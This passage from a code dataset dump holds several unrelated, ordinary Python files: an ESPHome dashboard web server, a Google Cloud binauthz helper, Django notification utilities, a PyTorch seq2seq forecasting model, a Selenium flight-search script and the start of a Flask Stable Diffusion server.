DownloadBinaryRequestHandler(BaseHandler):\n @authenticated\n @bind_config\n def get(self, configuration=None):\n # pylint: disable=no-value-for-parameter\n storage_path = ext_storage_path(settings.config_dir, configuration)\n storage_json = StorageJSON.load(storage_path)\n if storage_json is None:\n self.send_error()\n return\n\n path = storage_json.firmware_bin_path\n self.set_header('Content-Type', 'application/octet-stream')\n filename = f'{storage_json.name}.bin'\n self.set_header(\"Content-Disposition\", f'attachment; filename=\"{filename}\"')\n with open(path, 'rb') as f:\n while True:\n data = f.read(16384)\n if not data:\n break\n self.write(data)\n self.finish()\n\n\ndef _list_dashboard_entries():\n files = settings.list_yaml_files()\n return [DashboardEntry(file) for file in files]\n\n\nclass DashboardEntry:\n def __init__(self, path):\n self.path = path\n self._storage = None\n self._loaded_storage = False\n\n @property\n def filename(self):\n return os.path.basename(self.path)\n\n @property\n def storage(self): # type: () -> Optional[StorageJSON]\n if not self._loaded_storage:\n self._storage = StorageJSON.load(ext_storage_path(settings.config_dir, self.filename))\n self._loaded_storage = True\n return self._storage\n\n @property\n def address(self):\n if self.storage is None:\n return None\n return self.storage.address\n\n @property\n def name(self):\n if self.storage is None:\n return self.filename[:-len('.yaml')]\n return self.storage.name\n\n @property\n def comment(self):\n if self.storage is None:\n return None\n return self.storage.comment\n\n @property\n def esp_platform(self):\n if self.storage is None:\n return None\n return self.storage.esp_platform\n\n @property\n def board(self):\n if self.storage is None:\n return None\n return self.storage.board\n\n @property\n def update_available(self):\n if self.storage is None:\n return True\n return self.update_old != self.update_new\n\n @property\n def update_old(self):\n if self.storage is None:\n return ''\n return self.storage.esphome_version or ''\n\n @property\n def update_new(self):\n return const.__version__\n\n @property\n def loaded_integrations(self):\n if self.storage is None:\n return []\n return self.storage.loaded_integrations\n\n\nclass MainRequestHandler(BaseHandler):\n @authenticated\n def get(self):\n begin = bool(self.get_argument('begin', False))\n entries = _list_dashboard_entries()\n\n self.render(\"templates/index.html\", entries=entries, begin=begin,\n **template_args())\n\n\ndef _ping_func(filename, address):\n if os.name == 'nt':\n command = ['ping', '-n', '1', address]\n else:\n command = ['ping', '-c', '1', address]\n rc, _, _ = run_system_command(*command)\n return filename, rc == 0\n\n\nclass MDNSStatusThread(threading.Thread):\n def run(self):\n zc = Zeroconf()\n\n def on_update(dat):\n for key, b in dat.items():\n PING_RESULT[key] = b\n\n stat = DashboardStatus(zc, on_update)\n stat.start()\n while not STOP_EVENT.is_set():\n entries = _list_dashboard_entries()\n stat.request_query({entry.filename: entry.name + '.local.' 
for entry in entries})\n\n PING_REQUEST.wait()\n PING_REQUEST.clear()\n stat.stop()\n stat.join()\n zc.close()\n\n\nclass PingStatusThread(threading.Thread):\n def run(self):\n pool = multiprocessing.Pool(processes=8)\n while not STOP_EVENT.is_set():\n # Only do pings if somebody has the dashboard open\n\n def callback(ret):\n PING_RESULT[ret[0]] = ret[1]\n\n entries = _list_dashboard_entries()\n queue = collections.deque()\n for entry in entries:\n if entry.address is None:\n PING_RESULT[entry.filename] = None\n continue\n\n result = pool.apply_async(_ping_func, (entry.filename, entry.address),\n callback=callback)\n queue.append(result)\n\n while queue:\n item = queue[0]\n if item.ready():\n queue.popleft()\n continue\n\n try:\n item.get(0.1)\n except OSError:\n # ping not installed\n pass\n except multiprocessing.TimeoutError:\n pass\n\n if STOP_EVENT.is_set():\n pool.terminate()\n return\n\n PING_REQUEST.wait()\n PING_REQUEST.clear()\n\n\nclass PingRequestHandler(BaseHandler):\n @authenticated\n def get(self):\n PING_REQUEST.set()\n self.write(json.dumps(PING_RESULT))\n\n\ndef is_allowed(configuration):\n return os.path.sep not in configuration\n\n\nclass EditRequestHandler(BaseHandler):\n @authenticated\n @bind_config\n def get(self, configuration=None):\n filename = settings.rel_path(configuration)\n content = ''\n if os.path.isfile(filename):\n # pylint: disable=no-value-for-parameter\n with open(filename, 'r') as f:\n content = f.read()\n self.write(content)\n\n @authenticated\n @bind_config\n def post(self, configuration=None):\n # pylint: disable=no-value-for-parameter\n with open(settings.rel_path(configuration), 'wb') as f:\n f.write(self.request.body)\n self.set_status(200)\n\n\nclass DeleteRequestHandler(BaseHandler):\n @authenticated\n @bind_config\n def post(self, configuration=None):\n config_file = settings.rel_path(configuration)\n storage_path = ext_storage_path(settings.config_dir, configuration)\n storage_json = StorageJSON.load(storage_path)\n if storage_json is None:\n self.set_status(500)\n return\n\n name = storage_json.name\n trash_path = trash_storage_path(settings.config_dir)\n mkdir_p(trash_path)\n shutil.move(config_file, os.path.join(trash_path, configuration))\n\n # Delete build folder (if it exists)\n build_folder = os.path.join(settings.config_dir, name)\n if os.path.isdir(build_folder):\n shutil.rmtree(build_folder)\n\n\nclass UndoDeleteRequestHandler(BaseHandler):\n @authenticated\n @bind_config\n def post(self, configuration=None):\n config_file = settings.rel_path(configuration)\n trash_path = trash_storage_path(settings.config_dir)\n shutil.move(os.path.join(trash_path, configuration), config_file)\n\n\nPING_RESULT = {} # type: dict\nSTOP_EVENT = threading.Event()\nPING_REQUEST = threading.Event()\n\n\nclass LoginHandler(BaseHandler):\n def get(self):\n if is_authenticated(self):\n self.redirect('/')\n else:\n self.render_login_page()\n\n def render_login_page(self, error=None):\n self.render(\"templates/login.html\", error=error, hassio=settings.using_hassio_auth,\n has_username=bool(settings.username), **template_args())\n\n def post_hassio_login(self):\n import requests\n\n headers = {\n 'X-HASSIO-KEY': os.getenv('HASSIO_TOKEN'),\n }\n data = {\n 'username': self.get_argument('username', ''),\n 'password': self.get_argument('password', '')\n }\n try:\n req = requests.post('http://hassio/auth', headers=headers, data=data)\n if req.status_code == 200:\n self.set_secure_cookie(\"authenticated\", cookie_authenticated_yes)\n 
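# The cookie set above is signed with settings.cookie_secret (wired into\n # the application settings in make_app below), which is what\n # is_authenticated() verifies on subsequent requests.\n 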
self.redirect('/')\n return\n except Exception as err: # pylint: disable=broad-except\n _LOGGER.warning(\"Error during Hass.io auth request: %s\", err)\n self.set_status(500)\n self.render_login_page(error=\"Internal server error\")\n return\n self.set_status(401)\n self.render_login_page(error=\"Invalid username or password\")\n\n def post_native_login(self):\n username = self.get_argument(\"username\", '')\n password = self.get_argument(\"password\", '')\n if settings.check_password(username, password):\n self.set_secure_cookie(\"authenticated\", cookie_authenticated_yes)\n self.redirect(\"/\")\n return\n error_str = \"Invalid username or password\" if settings.username else \"Invalid password\"\n self.set_status(401)\n self.render_login_page(error=error_str)\n\n def post(self):\n if settings.using_hassio_auth:\n self.post_hassio_login()\n else:\n self.post_native_login()\n\n\nclass LogoutHandler(BaseHandler):\n @authenticated\n def get(self):\n self.clear_cookie(\"authenticated\")\n self.redirect('./login')\n\n\n_STATIC_FILE_HASHES = {}\n\n\ndef get_static_file_url(name):\n static_path = os.path.join(os.path.dirname(__file__), 'static')\n if name in _STATIC_FILE_HASHES:\n hash_ = _STATIC_FILE_HASHES[name]\n else:\n path = os.path.join(static_path, name)\n with open(path, 'rb') as f_handle:\n hash_ = hashlib.md5(f_handle.read()).hexdigest()[:8]\n _STATIC_FILE_HASHES[name] = hash_\n return f'./static/{name}?hash={hash_}'\n\n\ndef make_app(debug=False):\n def log_function(handler):\n if handler.get_status() < 400:\n log_method = access_log.info\n\n if isinstance(handler, SerialPortRequestHandler) and not debug:\n return\n if isinstance(handler, PingRequestHandler) and not debug:\n return\n elif handler.get_status() < 500:\n log_method = access_log.warning\n else:\n log_method = access_log.error\n\n request_time = 1000.0 * handler.request.request_time()\n # pylint: disable=protected-access\n log_method(\"%d %s %.2fms\", handler.get_status(),\n handler._request_summary(), request_time)\n\n class StaticFileHandler(tornado.web.StaticFileHandler):\n def set_extra_headers(self, path):\n if debug:\n self.set_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')\n\n static_path = os.path.join(os.path.dirname(__file__), 'static')\n app_settings = {\n 'debug': debug,\n 'cookie_secret': settings.cookie_secret,\n 'log_function': log_function,\n 'websocket_ping_interval': 30.0,\n }\n rel = settings.relative_url\n app = tornado.web.Application([\n (rel + \"\", MainRequestHandler),\n (rel + \"login\", LoginHandler),\n (rel + \"logout\", LogoutHandler),\n (rel + \"logs\", EsphomeLogsHandler),\n (rel + \"upload\", EsphomeUploadHandler),\n (rel + \"compile\", EsphomeCompileHandler),\n (rel + \"validate\", EsphomeValidateHandler),\n (rel + \"clean-mqtt\", EsphomeCleanMqttHandler),\n (rel + \"clean\", EsphomeCleanHandler),\n (rel + \"vscode\", EsphomeVscodeHandler),\n (rel + \"ace\", EsphomeAceEditorHandler),\n (rel + \"update-all\", EsphomeUpdateAllHandler),\n (rel + \"edit\", EditRequestHandler),\n (rel + \"download.bin\", DownloadBinaryRequestHandler),\n (rel + \"serial-ports\", SerialPortRequestHandler),\n (rel + \"ping\", PingRequestHandler),\n (rel + \"delete\", DeleteRequestHandler),\n (rel + \"undo-delete\", UndoDeleteRequestHandler),\n (rel + \"wizard.html\", WizardRequestHandler),\n (rel + r\"static/(.*)\", StaticFileHandler, {'path': static_path}),\n ], **app_settings)\n\n if debug:\n _STATIC_FILE_HASHES.clear()\n\n return app\n\n\ndef start_web_server(args):\n 
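# Sketch of the argparse-style namespace this function expects, derived\n # from the attribute accesses below; the values here are illustrative\n # placeholders, not the real esphome CLI defaults:\n # args = argparse.Namespace(verbose=False, socket=None, port=6052, open_ui=False)\n 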
settings.parse_args(args)\n mkdir_p(settings.rel_path(\".esphome\"))\n\n if settings.using_auth:\n path = esphome_storage_path(settings.config_dir)\n storage = EsphomeStorageJSON.load(path)\n if storage is None:\n storage = EsphomeStorageJSON.get_default()\n storage.save(path)\n settings.cookie_secret = storage.cookie_secret\n\n app = make_app(args.verbose)\n if args.socket is not None:\n _LOGGER.info(\"Starting dashboard web server on unix socket %s and configuration dir %s...\",\n args.socket, settings.config_dir)\n server = tornado.httpserver.HTTPServer(app)\n socket = tornado.netutil.bind_unix_socket(args.socket, mode=0o666)\n server.add_socket(socket)\n else:\n _LOGGER.info(\"Starting dashboard web server on port %s and configuration dir %s...\",\n args.port, settings.config_dir)\n app.listen(args.port)\n\n if args.open_ui:\n import webbrowser\n\n webbrowser.open(f'localhost:{args.port}')\n\n if settings.status_use_ping:\n status_thread = PingStatusThread()\n else:\n status_thread = MDNSStatusThread()\n status_thread.start()\n try:\n tornado.ioloop.IOLoop.current().start()\n except KeyboardInterrupt:\n _LOGGER.info(\"Shutting down...\")\n STOP_EVENT.set()\n PING_REQUEST.set()\n status_thread.join()\n if args.socket is not None:\n os.remove(args.socket)\n","repo_name":"wjcarpenter/mvturnho_esphome_ili9341","sub_path":"esphome/dashboard/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":24470,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"27766744039","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport json\n\nfrom containerregistry.client import docker_name\nfrom googlecloudsdk.core.exceptions import Error\nimport six\nfrom six.moves import urllib\n\n\nclass BadImageUrlError(Error):\n \"\"\"Raised when a container image URL cannot be parsed successfully.\"\"\"\n\n\ndef _ReplaceImageUrlScheme(image_url, scheme):\n \"\"\"Returns the passed `image_url` with the scheme replaced.\n\n Args:\n image_url: The URL to replace (or strip) the scheme from. (string)\n scheme: The scheme of the returned URL. If this is an empty string or\n `None`, the scheme is stripped and the leading `//` of the resulting URL\n will be stripped off.\n Raises:\n BadImageUrlError: `image_url` isn't valid.\n \"\"\"\n scheme = scheme or ''\n parsed_url = urllib.parse.urlparse(image_url)\n\n # If the URL has a scheme but not a netloc, then it must have looked like\n # 'scheme:///foo/bar', which is invalid for the purpose of attestation.\n if parsed_url.scheme and not parsed_url.netloc:\n raise BadImageUrlError(\n \"Image URL '{image_url}' is invalid because it does not have a host \"\n 'component.'.format(image_url=image_url))\n\n # If there is neither a scheme nor a netloc, this means that an unqualified\n # URL was passed, like 'gcr.io/foo/bar'. In this case we canonicalize the URL\n # by prefixing '//', which will cause urlparse to correctly pick up the\n # netloc.\n if not parsed_url.netloc:\n parsed_url = urllib.parse.urlparse('//{}'.format(image_url))\n\n # Finally, we replace the scheme and generate the URL. If we were stripping\n # the scheme, the result will be prefixed with '//', which we strip off. 
If\n # the scheme is non-empty, the lstrip is a no-op.\n return parsed_url._replace(scheme=scheme).geturl().lstrip('/')\n\n\ndef MakeSignaturePayloadDict(container_image_url):\n \"\"\"Creates a dict representing a JSON signature object to sign.\n\n Args:\n container_image_url: See `containerregistry.client.docker_name.Digest` for\n artifact URL validation and parsing details. `container_image_url` must\n be a fully qualified image URL with a valid sha256 digest.\n\n Returns:\n Dictionary of nested dictionaries and strings, suitable for passing to\n `json.dumps` or similar.\n \"\"\"\n url = _ReplaceImageUrlScheme(image_url=container_image_url, scheme='')\n try:\n repo_digest = docker_name.Digest(url)\n except docker_name.BadNameException as e:\n raise BadImageUrlError(e)\n return {\n 'critical': {\n 'identity': {\n 'docker-reference': six.text_type(repo_digest.as_repository()),\n },\n 'image': {\n 'docker-manifest-digest': repo_digest.digest,\n },\n 'type': 'Google cloud binauthz container signature',\n },\n }\n\n\ndef MakeSignaturePayload(container_image_url):\n \"\"\"Creates a JSON bytestring representing a signature object to sign.\n\n Args:\n container_image_url: See `containerregistry.client.docker_name.Digest` for\n artifact URL validation and parsing details. `container_image_url` must\n be a fully qualified image URL with a valid sha256 digest.\n\n Returns:\n A bytestring representing a JSON-encoded structure of nested dictionaries\n and strings.\n \"\"\"\n payload_dict = MakeSignaturePayloadDict(container_image_url)\n # `separators` is specified as a workaround to the native `json` module's\n # https://bugs.python.org/issue16333 which results in inconsistent\n # serialization in older versions of Python.\n payload = json.dumps(\n payload_dict,\n ensure_ascii=True,\n indent=2,\n separators=(',', ': '),\n sort_keys=True,\n )\n # NOTE: A newline is appended for backwards compatibility with the previous\n # payload serialization which relied on gcloud's default JSON serialization.\n return '{}\\n'.format(payload).encode('utf-8')\n\n\ndef RemoveArtifactUrlScheme(artifact_url):\n \"\"\"Ensures the given URL has no scheme (e.g.\n\n replaces \"https://gcr.io/foo/bar\" with \"gcr.io/foo/bar\" and leaves\n \"gcr.io/foo/bar\" unchanged).\n\n Args:\n artifact_url: A URL string.\n Returns:\n The URL with the scheme removed.\n \"\"\"\n url_without_scheme = _ReplaceImageUrlScheme(artifact_url, scheme='')\n try:\n # The validation logic in `docker_name` silently produces incorrect results\n # if the passed URL has a scheme.\n docker_name.Digest(url_without_scheme)\n except docker_name.BadNameException as e:\n raise BadImageUrlError(e)\n return url_without_scheme\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/container/binauthz/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"37026084499","text":"from .models import Notification, PushNotificationDevice\nfrom profile.models import Profile\n\ndef create_notification(notifier, recipient, type, **kwargs):\n try:\n Notification.objects.create(\n notifier=notifier,\n recipient=recipient,\n notification_type=type,\n status=Notification.NEW,\n amount=kwargs.get('amount'),\n memo=kwargs.get('memo'),\n )\n return True\n except Exception as e:\n print(e)\n return False\n\n\ndef subscribe_to_push(user, device_id):\n \"\"\"\n Subscribe logged-in device to push 
notification\n \"\"\"\n if PushNotificationDevice.objects.filter(device_id=device_id).all():\n return\n\n profile = Profile.objects.get(user__exact=user)\n device = PushNotificationDevice(\n profile=profile,\n device_id=device_id,\n )\n device.save()\n","repo_name":"DevFamily99/villages-django","sub_path":"notification/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41429151758","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport os\nimport math\nfrom tqdm import tqdm\nfrom torch.utils.data import TensorDataset, DataLoader\n\nabs_path = os.getcwd()\n\n\nclass Encoder(nn.Module):\n def __init__(self, input_size, hidden_dim, n_layers, drop_prob):\n super(Encoder, self).__init__()\n # init\n self.hidden_dim = hidden_dim\n self.n_layers = n_layers\n # layer\n self.rnn = nn.GRU(input_size,\n hidden_dim,\n n_layers,\n bidirectional=False,\n dropout=drop_prob)\n\n def forward(self, x):\n # x shape:(`batch_size`, `num_steps`, `input_size`)\n x = torch.transpose(x, 0, 1)\n rnn_out, state = self.rnn(x)\n return rnn_out, state\n\n\nclass DotProductAttention(nn.Module):\n\n def __init__(self, dropout, **kwargs):\n super(DotProductAttention, self).__init__(**kwargs)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, queries, keys, values):\n d = queries.shape[-1]\n scores = torch.bmm(queries, keys.transpose(1, 2)) / math.sqrt(d)\n self.attention_weights = nn.functional.softmax(scores, dim=-1)\n return torch.bmm(self.dropout(self.attention_weights), values)\n\n\nclass AttnDecoder(nn.Module):\n def __init__(self, input_size, hidden_dim, n_layers, drop_prob):\n super(AttnDecoder, self).__init__()\n\n self.attention = DotProductAttention(drop_prob)\n self.rnn = nn.GRU(input_size + hidden_dim, hidden_dim, n_layers, dropout=drop_prob)\n self.fc = nn.Sequential()\n\n input_size = hidden_dim\n i = 0\n while (input_size > 8):\n self.fc.add_module('linear{}'.format(i),\n nn.Linear(input_size, round(input_size / 2)))\n self.fc.add_module('relu{}'.format(i), nn.ReLU())\n input_size = round(input_size / 2)\n i += 1\n self.fc.add_module('linear{}'.format(i), nn.Linear(input_size, 1))\n\n def forward(self, inputs, encoder_outputs, encoder_state):\n \"\"\"\n :inputs shape (batch_size, target_len, input_size)\n :encoder_outputs shape (seq_len, batch_size, hidden_dim)\n :encoder_state shape (n_layers, batch_size, hidden_dim)\n \"\"\"\n # inputs shape(target_len, batch_size, input_size)\n inputs = torch.transpose(inputs, 0, 1)\n # encoder_outputs shape (batch_size, seq_len, hidden_dim)\n encoder_outputs = torch.transpose(encoder_outputs, 0, 1)\n # decoder_state init\n decoder_state = encoder_state\n outputs = []\n\n for i, x in enumerate(inputs):\n # query shape is (batch_size, 1, hidden_dim)\n query = torch.unsqueeze(decoder_state[-1], dim=1)\n context = self.attention(query, encoder_outputs, encoder_outputs)\n # training process is different from eval process\n # if i and not self.training:\n if i:\n x[:, -1] = out.detach().flatten()\n # x shape is (batch_size, 1, hidden_dim + input_size)\n x = torch.cat((context, torch.unsqueeze(x, dim=1)), dim=-1)\n # x reshape to (1, batch_size, hidden_dim + input_size)\n x = torch.transpose(x, 0, 1)\n # out shape (1, batch_size, hidden_dim)\n out, decoder_state = self.rnn(x, decoder_state)\n # out shape (batch_size, 1)\n out = self.fc(out.squeeze(dim=0))\n outputs.append(out)\n # outputs shape (batch_size, target_len)\n 
outputs = torch.cat(outputs, dim=1)\n return outputs\n\n\nclass Seq2Seq_Attn(nn.Module):\n def __init__(self, input_size, hidden_dim, n_layers, drop_prob):\n super(Seq2Seq_Attn, self).__init__()\n self.encoder = Encoder(input_size, hidden_dim, n_layers, drop_prob)\n self.decoder = AttnDecoder(input_size, hidden_dim, n_layers, drop_prob)\n\n def forward(self, encoder_inputs, decoder_inputs):\n # encoder_inputs shape (batch_size, seq_len, input_size)\n # decoder_inputs shape (batch_size, target_len, input_size)\n encoder_outputs, encoder_state = self.encoder(encoder_inputs)\n outputs = self.decoder(decoder_inputs, encoder_outputs, encoder_state)\n return outputs\n\n\ndef train_model(train_x, train_y, valid_x, valid_y, input_size, mse_thresh, hidden_dim,\n n_layers, number_epoch, batch_size, lr, drop_prob,\n weight_decay, device):\n while 1:\n model = Seq2Seq_Attn(input_size, hidden_dim, n_layers, drop_prob)\n model = model.to(device)\n criterion = nn.MSELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1, gamma=0.98)\n valid_loss_min = np.Inf\n train_dataset = TensorDataset(torch.FloatTensor(train_x),\n torch.FloatTensor(train_y))\n valid_dataset = TensorDataset(torch.FloatTensor(valid_x),\n torch.FloatTensor(valid_y))\n\n train_loader = DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True,\n drop_last=True)\n valid_loader = DataLoader(dataset=valid_dataset,\n batch_size=batch_size,\n shuffle=True,\n drop_last=True)\n train_losses = list()\n\n num_without_imp = 0\n\n train_loss_list = []\n valid_loss_list = []\n # train\n for epoch in range(1, number_epoch + 1):\n loop = tqdm(enumerate(train_loader),\n total=len(train_loader),\n leave=True, ncols=100)\n for i, (inputs, labels) in loop:\n inputs = inputs.to(device)\n labels = labels.to(device)\n optimizer.zero_grad()\n encoder_inputs = inputs\n decoder_inputs = torch.cat((inputs[:, -1:, :], labels[:, :-1, :]), dim=1)\n outputs = model(encoder_inputs, decoder_inputs)\n loss = criterion(outputs, labels[:, :, -1])\n train_losses.append(loss.item())\n loss.backward()\n optimizer.step()\n\n # eval\n if i % 5 == 0:\n num_without_imp = num_without_imp + 1\n valid_losses = list()\n model.eval()\n for inp, lab in valid_loader:\n inp = inp.to(device)\n lab = lab.to(device)\n encoder_inp = inp\n decoder_inp = torch.cat((inp[:, -1:, :], lab[:, :-1, :]), dim=1)\n out = model(encoder_inp, decoder_inp)\n valid_loss = criterion(out, lab[:, :, -1])\n valid_losses.append(valid_loss.item())\n model.train()\n loop.set_description(\"Epoch: {}/{}...\".format(\n epoch, number_epoch))\n loop.set_postfix(train_loss=loss.item(),\n valid_loss=np.mean(valid_losses))\n train_loss_list.append(loss.item())\n valid_loss_list.append(np.mean(valid_losses))\n if np.mean(valid_losses) < valid_loss_min:\n num_without_imp = 0\n torch.save(model.state_dict(), abs_path + \"/models/model/seq2seq_DPA_state_dict.pt\")\n valid_loss_min = np.mean(valid_losses)\n scheduler.step()\n if valid_loss_min < mse_thresh:\n break\n return model, train_loss_list, valid_loss_list\n\n\ndef test_model(model, test_x, test_y, scaler_y, batch_size, device):\n test_dataset = TensorDataset(torch.FloatTensor(test_x),\n torch.FloatTensor(test_y))\n test_loader = DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n shuffle=False,\n drop_last=True)\n model.load_state_dict(torch.load(abs_path + \"/models/model/seq2seq_DPA_state_dict.pt\"))\n y_pred = []\n y_true = []\n with 
torch.no_grad():\n model.eval()\n for inputs, labels in test_loader:\n inputs = inputs.to(device)\n labels = labels.to(device)\n encoder_inputs = inputs\n decoder_inputs = torch.cat((inputs[:, -1:, :], labels[:, :-1, :]),\n dim=1)\n outputs = model(encoder_inputs, decoder_inputs)\n y_pred += outputs.cpu().numpy().flatten().tolist()\n y_true += labels[:, :, -1].cpu().numpy().flatten().tolist()\n y_pred = np.array(y_pred).reshape(-1, 1)\n y_true = np.array(y_true).reshape(-1, 1)\n # pdb.set_trace()\n load_pred = scaler_y.inverse_transform(y_pred)\n load_true = scaler_y.inverse_transform(y_true)\n mean_pred = np.mean(load_pred)\n mean_true = np.mean(load_true)\n MAPE = np.mean(np.abs(load_true - load_pred) / load_true)\n SMAPE = 2 * np.mean(\n np.abs(load_true - load_pred) / (load_true + load_pred))\n MAE = np.mean(np.abs(load_true - load_pred))\n RRSE = np.sqrt(np.sum(np.square(load_true - load_pred))) / np.sqrt(\n np.sum(np.square(load_true - mean_true)))\n return MAPE, SMAPE, MAE, RRSE, load_pred, load_true\n","repo_name":"Mark-THU/DARNet-load-forecast","sub_path":"models/Seq2seq.py","file_name":"Seq2seq.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19379875574","text":"##### Python and Selenium to automatically open expedia.com, enter SLC departure, SEA arrival and dates. Output to console\r\n\r\n### Import modules/libraries\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.common.by import By\r\nimport selenium.webdriver.support.ui as ui\r\nimport selenium.webdriver.support.expected_conditions as EC\r\nimport os\r\nimport time\r\n\r\nclass expediaUnitTest():\r\n \r\n ### Create class and initiate environment variables \r\n\tdef __init__(self):\r\n\t\toptions = webdriver.ChromeOptions()\r\n\t\toptions.add_argument('--ignore-certificate-errors')\r\n\t\toptions.add_argument('--ignore-ssl-errors')\r\n\t\tdir_path = os.path.dirname(os.path.realpath(__file__))\r\n\t\tchromedriver = dir_path + \"/chromedriver\"\r\n\t\tos.environ[\"webdriver.chrome.driver\"] = chromedriver\r\n\t\tself.driver = webdriver.Chrome(chrome_options=options, executable_path= chromedriver)\r\n\r\n\r\n### Launch Chrome expedia.com. Enters flight origin, destination, and dates. Clicks Submit button.\r\n\tdef gotoexpedia(self):\r\n\t\tself.driver.get(\"https://www.expedia.com/\")\r\n\t\tui.WebDriverWait(self.driver, 15).until(EC.visibility_of_element_located((By.ID, \"tab-flight-tab-hp\")))\r\n\t\tself.driver.find_element_by_id(\"tab-flight-tab-hp\").click()\r\n\t\tui.WebDriverWait(self.driver, 15).until(EC.visibility_of_element_located((By.ID, \"flight-origin-hp-flight\")))\r\n\t\tself.driver.find_element_by_id(\"flight-origin-hp-flight\").send_keys('SLC')\r\n\t\tself.driver.find_element_by_id(\"flight-destination-hp-flight\").send_keys('LAX')\r\n\t\tself.driver.find_element_by_id(\"flight-departing-hp-flight\").send_keys('03/01/2018')\r\n\t\tself.driver.find_element_by_id(\"flight-returning-hp-flight\").clear()\r\n\t\tself.driver.find_element_by_id(\"flight-returning-hp-flight\").send_keys('03/05/2018')\r\n\t\tself.driver.find_element_by_class_name('gcw-submit').click()\r\n\t\ttime.sleep(10)\r\n\r\n# Loops through flightModuleList. Specifies \"//*\" to select everything in each module, then prints out class attribute name and prices to console. 
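Prices are read from elements whose class attribute is 'dollars price-emphasis'.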
\t\t\r\n\t\tparentTab = self.driver.find_element_by_id('flightModuleList')\r\n\t\tfor selectAll in parentTab.find_elements_by_xpath(\"//*\"):\r\n\t\t\tif selectAll.get_attribute(\"class\") == 'dollars price-emphasis':\r\n\t\t\t\tprint (selectAll.get_attribute(\"class\"))\r\n\t\t\t\tprint (selectAll.text)\r\n\t\t\r\n# Closes Chrome after time.sleep \t\r\n\tdef teardown(self):\r\n\t\ttime.sleep(10)\r\n\t\tself.driver.close()\r\n\r\nif __name__ == \"__main__\":\r\n\tobj = expediaUnitTest()\r\n\tobj.gotoexpedia()\r\n\tobj.teardown()\r\n\t\r\n\r\n","repo_name":"Bearzz/expediaAutomation","sub_path":"testplaneprices.py","file_name":"testplaneprices.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31759198940","text":"import pandas as pd\nimport pickle\n# import numpy as np\n# import json\n\ndata_file = open(\"../../data/raw\"+\"/final_hdsi_faculty_updated.csv\", \"r\")\n\ndf = pd.read_csv(data_file)\n\ndf_test = df.sample(frac=0.1, random_state=1, ignore_index=True)\n\n# ---------------\nprint('export test.csv to test/raw folder')\ndf_test.to_csv('../../test/raw/test_data.csv', index=True, sep='\\t')\n\nprint('get number of authors in the new dataframe')\nnumber_of_authors = len(list(df_test['HDSI_author'].unique()))\n\nprint(number_of_authors)\n\npickle.dump(number_of_authors, open('../../test/raw/number_of_authors.pkl', 'wb'))\n\n# ---------------\n\n# pd.DataFrame.from_dict(data_cfg, orient=\"index\").transpose()\n\n\n","repo_name":"IreneLiu2018/capstone_a14","sub_path":"Irene/test/raw/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43145304561","text":"from org import StableDiffusion\nfrom flask import Flask,request, jsonify\n# from flask_socketio import SocketIO, send, emit\nimport argparse\nfrom waitress import serve\nimport logging\nimport io\n\nfrom send_slack import send_file\n\napp = Flask(__name__)\n\nclass Dummy():\n def __init__(self) -> None: \n app.logger.info('use dummy')\n name = \"dummy\"\n\n def predict(self, prompt):\n return 'dummy'\n \nclass InitModelMiddlewere:\n def __init__(self, app, stableDiffusion):\n self.app = app\n self.sd = stableDiffusion \n\n def __call__(self, environ, start_response): \n if 'sd' not in environ.keys(): \n environ['sd'] = self.sd\n return self.app(environ, start_response)\n\ndef img_to_byte(img):\n imgByteArr = io.BytesIO()\n img.save(imgByteArr, format='png')\n imgByteArr = imgByteArr.getvalue()\n return imgByteArr\n\n@app.before_request\ndef log_request_info():\n app.logger.info('%s - %s - %s - %s', request.remote_addr, request.method, request.url, request.query_string)\n\n@app.route(\"/\", methods=['GET'])\ndef echo():\n return {\n \"message\": 'ok',\n }\n\n\"\"\"\nquery_string(required): prompt\nreturn: image array\n\"\"\"\n@app.route('/predict', methods=['GET'])\ndef predict():\n args = request.args \n prompt = args.get('prompt')\n if prompt is None:\n return jsonify({'message': 'prompt must set'}), 400\n\n if 'sd' not in request.environ.keys():\n return jsonify({'message': 'sd not set...'}), 500\n \n sd = request.environ['sd']\n\n try: \n sd = request.environ['sd']\n result = sd.predict(prompt)\n images = [ v.tolist() for v in result]\n return jsonify({ 'message': 'ok', 'images': images })\n except Exception as e:\n app.logger.info('exception %s', e)\n return jsonify({'message': 'server error'}), 
